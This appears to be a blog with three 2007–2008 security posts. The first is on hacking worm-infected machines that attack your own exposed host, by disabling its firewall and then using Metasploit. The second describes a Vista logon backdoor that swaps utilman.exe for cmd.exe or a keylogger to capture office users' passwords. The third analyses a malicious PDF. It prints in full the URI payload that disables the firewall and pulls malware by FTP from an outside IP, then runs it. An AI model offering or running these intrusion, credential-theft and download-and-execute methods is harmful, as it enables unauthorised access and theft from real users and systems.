|
____________________________________________________________
07th January, 2008
Hacking the hacked
I thought it would be nice to mention about how to hack into machines
already compromised. Now scanning an IP address space is not ideal to find
vulnerable machines because choosing what range to scan, scanning a range,
querying vulnerable IP addresses, etc. takes time and resources not to
mention setting off alarms somewhere else with your IP address getting logged.
A much better way is just wait for someone to come and attack you :) Yes
viruses/worms are our best friend in this case. Chances are these infected
machines are still not patched as to why they are infected.
There a number of steps you will need to take:
1. Firstly make sure your machine is fully patched.
- You do not want to be the victim here :)
2. Install an intrusion detection/prevention software.
- This will give you the information to what vulnerability the worm is
trying to exploit plus will
give you added protection.
3. Put your machine in the DMZ to receive external traffic.
- If you are using a modem then chances are you will already have your
IP address external facing.
4. Disable your Windows
firewall.
- If it is enabled then all
inbound traffic will be blocked and your
intrusion detection software will not detect any malicious traffic.
You will be amazed how often your machine will get hit by worms using
vulnerabilities, some over 4 years old. What is more surprising are that
these infected machines are still not even patched :)
Once you've gathered a few IP addresses just take a moment to check the
machine if it is still vulnerable using single vulnerability scanner
tools. Once confirmed then just load up Metasploit and do your stuff.
click to enlarge
Best way to protect yourself from being compromised is use a natted
router. This will block any inbound external traffic hitting your internal
boxes.
____________________________________________________________
23rd November, 2007
Windows Vista Backdoor
Logon
The backdoor method works by exploiting the "Ease of Access" button
at the bottom left of the
Windows Vista Logon screen. Normally if you click the icon you will get a
choice of options Narrator, Magnifier, etc.
The way to exploit this is by replacing any one of the files with your own
program. Say if magnify.exe was replaced with cmd.exe then selecting
the magnify option would
bring up the console window.
Obviously in order to replace such windows files you will first need to
logon to the system with admin rights, take ownership of the file and
then replace the file with
with one of your own.
If you ever forgot your logon password you could use this backdoor
method and reset the password or connect to a remote share and copy
your files over.
The choices of files you can modify to get the backdoor working are:
magnify.exe, narrator.exe, osk.exe or utilman.exe
The utilman.exe is the main program that brings up the Ease of Access
window which calls the rest of the programs.
If you wanted to capture
someone's logon credentials normally even with local admin rights to the
box, majority key logging tools do not intercept keystrokes at the
ctrl+alt+del stage whether the tool has been loaded
up at boot as a service or
as a program.
click to enlarge
This backdoor method works a treat in an office environment for capturing
passwords.
1. Remotely connect to a desktop machine
2. Replace a file say utilman.exe with your key logger
3. Walk upto the desk and click on the "ease of access" button
Now just wait for the user to logon to capture the credentials :). Once
logged in the key logger terminates.
The Windows function GetAsyncKeyState() is all it takes to design a key
logger and is the easiest option.
One solution to mitigate the risk would be to make sure the utilman.exe
executable does not get replaced or executed. Various products on
the market will be able to lock it down.
Reference:
http://www.computerperformance.co.uk/vista/vista_backdoor_logon.htm
____________________________________________________________
14th November, 2007
Windows
URI protocol handling vulnerability
This is an interesting vulnerability first got published at the end of
July 2007 but really brought to light at the end of October 2007 when
spammers exploited this vulnerability by sending a specially crafted
URI (Uniform Resource Identifier) containing a "%" character and ending
with a certain extension (e.g. ".bat" or ".cmd").
Internet Explorer 7 on Windows XP or Server 2003 changes the way
Windows handles URIs. This change has introduced a flaw that can cause
Windows to incorrectly determine the appropriate handler for the protocol
specified in a URI.
In other words an input validation error within the handling of URIs
with registered URI handlers.
(e.g. "mailto", "news", "nntp", "snews", "telnet", and "http").
Adobe Reader and Firefox are to name a few which is used as an attack
vector to exploit this vulnerability.
The actual malicious PDF file spammed which was brought to my attention
was called "report.pdf" and was only 3,919 bytes in size.
Heres the embedded code which is obvious on what it does:
<</URI(mailto:%/../../../../../../windows/system32/cmd".exe"" /c /q
\"@netsh firewall set opmode mode=disable&@echo o 203.121.69.116>7&@echo
binary>>7&@echo get /ms32.exe>>7&@echo quit>>7&@ftp -s:7 -v -A>nul&@del /q
7&@start ms32.exe&\" \"&\" "con.cmd)/S/URI>>
As you can see the remote code execution was beautifully crafted.
Here are the steps it takes:
1. netsh firewall set opmode mode=disable
- disables the windows firewall.
2. echo o 203.121.69.116>7&@echo binary>>7&@echo get /ms32.exe>>7&@echo
quit>>7
- creates a script which will be used by ftp, script called here is
7
3. ftp -s:7 -v -A>nul
- runs the script via ftp which downloads the malware called
ms32.exe
4. del /q 7
- deletes the script
5. start ms32.exe
- finally executes the malware ms32.exe
6. GAMEOVER :)
McAfee AV detects the malware as Exploit-PDF
Sophos AV detects the malware as W32/PDF-URI.L
Symantec AV detects the malware as Bloodhound.Exploit.163
Updates for Adobe and Firefox have been released which mitigate this
vulnerability.
Microsoft have finally
released an update on the 13th of November updating the shell32.dll library which
handles the URIs.
References:
http://secunia.com/advisories/26201/
http://www.kb.cert.org/vuls/id/403150/
http://www.us-cert.gov/cas/techalerts/TA07-297B.html
http://www.microsoft.com/technet/security/advisory/943521.mspx
http://vil.nai.com/vil/content/v_139103.htm
http://www.f-secure.com/v-descs/exploit_w32_pdf-uri_l.shtml
http://securityresponse.symantec.com/security_response/ +
writeup.jsp?docid=2007-102318-0451-99&tabid=1
http://www.microsoft.com/technet/security/Bulletin/MS07-061.mspx
|
